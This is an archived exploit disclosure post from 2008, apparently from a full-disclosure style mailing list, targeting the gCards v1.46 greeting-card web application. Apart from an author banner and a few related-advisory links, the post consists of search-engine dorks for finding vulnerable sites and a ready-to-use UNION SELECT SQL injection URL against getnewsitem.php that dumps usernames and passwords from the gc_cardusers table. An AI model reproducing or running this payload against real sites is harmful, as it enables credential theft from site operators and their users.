Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

[Full-disclosure] Cross site scripting issues in s9y (CVE-2008-1386, CVE-2008-1387)

Xoops All Version -Articles- Article.PHP (ID) Blind SQL Injection ExpL0it

From:	turkish-warriorr_(at)_hotmail.com <turkish-warriorr_(at)_hotmail.com>
Date:	22.04.2008
Subject:	Powered by gCards v1.46 SQL

Powered by gCards v1.46 SQL
#########################################################################
#
# AUTHOR : TurkishWarriorr
#
# HOME : http://www.1923turk.org
#
#########################################################################
#
# DORKS 1 : Powered by gCards v1.46
# DORKS 2 : gcards/
#
##########################################################################
EXPLOIT :

gcards/getnewsitem.php?newsid=1+union+select+1,2,concat(username,
char(45),userpass),4,5+FROM+gc_cardusers--


##########################################################################
                              www.1923turk.org                     
                       turkish-warriorr@hotmail.com